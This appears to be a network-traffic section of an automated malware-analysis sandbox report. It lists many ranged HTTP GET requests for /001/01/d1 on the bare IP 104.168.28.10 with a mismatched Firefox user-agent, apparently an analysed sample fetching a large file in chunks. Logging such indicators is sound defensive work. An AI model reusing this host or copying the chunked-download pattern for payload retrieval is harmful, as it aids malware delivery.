Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3248128-3280895 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3280896-3289087 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3289088-3305471 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3305472-3321855 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3321856-3338239 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3338240-3354623 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3354624-3371007 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3371008-3403775 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3403776-3411967 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3411968-3420159 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3420160-3452927 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3371008-3403775User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3452928-3469311User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3469312-3477503User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3477504-3510271User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3510272-3514367User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3514368-3547135User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3547136-3563519User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3563520-3579903User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3579904-3596287User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3596288-3604479User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3514368-3547135User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3563520-3579903User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3604480-3637247User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3637248-3641343User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3641344-3657727User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3657728-3665919User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3665920-3674111User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3674112-3690495User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3690496-3706879User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3665920-3674111User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3706880-3708927User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3708928-3741695User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3741696-3758079User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3758080-3790847User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3790848-3799039User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3741696-3758079User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3799040-3803135User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3790848-3799039User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3803136-3807231User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3807232-3815423User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3803136-3807231User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3815424-3823615User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3823616-3839999User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3840000-3856383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3856384-3860479User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3860480-3868671User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3868672-3872767User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3872768-3905535User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3905536-3913727User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3913728-3930111User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3930112-3946495User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3868672-3872767User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3946496-3962879User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3962880-3995647User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3995648-4003839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4003840-4005887User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4005888-4022271User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4022272-4024319User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4024320-4089855User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4089856-4093951User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4093952-4110335User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4110336-4114431User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4114432-4122623User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4122624-4130815User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4130816-4163583User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4163584-4171775User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4171776-4188159User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4122624-4130815User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4188160-4204543User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4204544-4212735User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4212736-4245503User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4245504-4249599User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4249600-4257791User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4257792-4261887User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4261888-4270079User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4270080-4286463User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4286464-4351999User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4352000-4353023User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4353024-4361215User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4361216-4369407User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4369408-4371455User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4371456-4387839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4387840-4396031User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4396032-4400127User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4371456-4387839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4400128-4416511User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4416512-4424703User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4424704-4441087User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4441088-4445183User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4445184-4461567User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4461568-4469759User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4469760-4473855User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4473856-4482047User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4482048-4490239User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4490240-4506623User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4506624-4514815User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4514816-4523007User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4523008-4531199User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4531200-4539391User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4539392-4543487User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4543488-4559871User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4539392-4543487User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4559872-4576255User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4576256-4609023User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4609024-4625407User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4625408-4658175User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4658176-4690943User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4690944-4695039User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4695040-4697087User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4697088-4705279User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4705280-4709375User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4709376-4713471User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4713472-4779007User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4779008-4787199User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4787200-4795391User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4795392-4803583User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4803584-4805631User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4805632-4809727User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4803584-4805631User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4809728-4826111User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
